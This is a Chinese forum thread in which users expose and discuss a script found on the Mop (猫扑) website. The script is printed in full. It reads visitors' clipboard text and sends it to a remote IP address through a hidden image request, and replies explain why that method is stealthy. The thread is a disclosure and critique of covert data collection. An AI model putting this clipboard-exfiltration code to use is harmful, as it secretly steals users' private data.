猫扑的页面
都说猫扑很火,无聊就去看了看。上来就跳出来一个对话框要播放一个shockwave的东东,可能因为欧没有装有关的插件。满页面乱七八糟,不喜欢。俺猜是不是广告垃圾太多,就看看用Adblock能不能屏蔽一些,结果看到有这么一条:<script src="http://211.100.32.96/monitor.js"></script>,内容是
function URLencode(sStr) {
return escape(sStr).replace(/\+/g, '%2B').replace(/\"/g,'%22').replace(/\'/g, '%27').replace(/\//g,'%2F');
}
var content = window.clipboardData.getData('Text');
if(content){
if(content != '' && content != 'null' && content.length<500){
var keyimg = new Image();
keyimg.src='http://211.100.32.96/save.jsp?key='+URLencode(content);
}
}
俺虽然不懂脚本,不过是在觉得可疑。他猫扑为什么要存俺剪贴板的内容呢?好在这东东只有IE支持,而且要打开允许脚本访问剪贴板。 连ClipBoard都不放过,唉...... 这个脚本是很奇怪,理论是取剪切板里的小于500个字长的text类型文件,然后送到服务器端去存储,之后返回一个图片文件的url地址到本地。感觉是类似于信息搜索的东东 这只是用来上传盗取的信息的手段。
如果用put方式,就要用javascript操作form,悄悄地提交,则涉及到页面刷新问题,得用iframe。而使用隐式img(注意该img并不在页面中得到应用),则是简单地利用了get方式,比较隐蔽。
而http规范对get的查询串大小是有限制的,所以他不得已才截了一部分,否则肯定是能偷多少就偷多少。如今的网站,很是居心叵测啊...... 也亏得有这个限制,不然他很容易被自己的脚本DoS攻击呢,呵呵
页:
[1]